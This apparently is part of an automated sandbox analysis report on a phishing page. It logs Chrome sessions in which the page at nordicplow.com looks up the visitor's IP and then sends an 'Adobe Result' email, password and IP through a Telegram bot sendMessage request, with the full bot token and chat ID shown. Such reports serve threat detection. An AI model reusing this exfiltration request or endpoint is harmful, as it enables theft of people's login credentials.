                                        ETag: "24e0310-1017-5d0dca9a37e40"
                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                        Cache-Control: max-age=315360000
                                        X-Sucuri-Cache: HIT
                                        Accept-Ranges: bytes


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.6 | 49827 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:39 UTC | 559 | OUT | GET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:39 UTC | 463 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:39 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f32ee1e43fe-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1623&rtt_var=611&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1137&delivery_rate=1789215&cwnd=227&unsent_bytes=0&cid=30d47e566c6620ba&ts=136&x=0"
                                        2025-01-14 17:22:39 UTC | 21 | IN | Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.6 | 49832 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:39 UTC | 349 | OUT | GET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:39 UTC | 430 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:39 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f36d8c40cc8-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1512&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1931216&cwnd=230&unsent_bytes=0&cid=ddf37063bb3043b0&ts=159&x=0"
                                        2025-01-14 17:22:39 UTC | 21 | IN | Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:39 UTC | 794 | OUT | GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:40 UTC | 388 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:40 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        Data Ascii: {"ok":true,"result":{"message_id":860,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875360,"text":"**


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.6 | 49839 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:40 UTC | 584 | OUT | GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:41 UTC | 388 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:41 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        Data Ascii: {"ok":true,"result":{"message_id":861,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875361,"text":"**


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.6 | 49909 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:51 UTC | 559 | OUT | GET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:51 UTC | 463 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:51 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f7e8d7c42f8-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1610&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1137&delivery_rate=1765417&cwnd=234&unsent_bytes=0&cid=4059c597a2ee55cb&ts=169&x=0"
                                        2025-01-14 17:22:51 UTC | 21 | IN | Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.6 | 49912 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:51 UTC | 349 | OUT | GET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:51 UTC | 430 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:51 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4f825df843b6-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=2421&min_rtt=2404&rtt_var=914&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1214642&cwnd=227&unsent_bytes=0&cid=b0b5b072e39cb00b&ts=137&x=0"
                                        2025-01-14 17:22:51 UTC | 21 | IN | Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.6 | 49911 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:51 UTC | 794 | OUT | GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:52 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        Data Ascii: {"ok":true,"result":{"message_id":862,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875372,"text":"**


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.6 | 49918 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:22:52 UTC | 584 | OUT | GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:53 UTC | 388 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:22:53 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:22:53 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 37 33 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":863,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875373,"text":"**


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.6 | 50000 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:23:06 UTC | 559 | OUT | GET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:06 UTC | 463 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:23:06 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4fdceb236a53-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1582&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1137&delivery_rate=1845764&cwnd=222&unsent_bytes=0&cid=86fe487d4f57cb3d&ts=191&x=0"
                                        2025-01-14 17:23:06 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.2.6 | 50005 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:23:06 UTC | 349 | OUT | GET /?format=json HTTP/1.1
                                        Host: api.ipify.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:07 UTC | 431 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:23:07 GMT
                                        Content-Type: application/json
                                        Content-Length: 21
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 901f4fe11bd541df-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=8922&min_rtt=1663&rtt_var=5083&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1755862&cwnd=252&unsent_bytes=0&cid=4b389b4de768c7b8&ts=175&x=0"
                                        2025-01-14 17:23:07 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                        Data Ascii: {"ip":"8.46.123.189"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.2.6 | 50004 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:23:07 UTC | 794 | OUT | GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://www.nordicplow.com
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://www.nordicplow.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:23:07 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:23:07 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 38 37 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":864,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875387,"text":"**


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.6 | 50006 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-01-14 17:23:08 UTC | 584 | OUT | GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:23:08 UTC | 388 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0
                                        Date: Tue, 14 Jan 2025 17:23:08 GMT
                                        Content-Type: application/json
                                        Content-Length: 478
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-14 17:23:08 UTC478INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 32 32 33 36 36 32 32 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6b 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 6d 61 78 78 33 35 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 32 38 34 31 30 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 53 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 68 73 63 6f 72 74 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 37 35 33 38 38 2c 22 74 65 78 74 22 3a 22 2a 2a
                                        Data Ascii: {"ok":true,"result":{"message_id":865,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875388,"text":"**


                                        Target ID:1
                                        Start time:12:22:11
                                        Start date:14/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff684c40000
                                        File size:3'242'272 bytes
                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:3
                                        Start time:12:22:16
                                        Start date:14/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff684c40000
                                        File size:3'242'272 bytes
                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:4
                                        Start time:12:22:22
                                        Start date:14/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://savory-sweet-felidae-psrnd.glitch.me/"
                                        Imagebase:0x7ff684c40000
                                        File size:3'242'272 bytes
                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly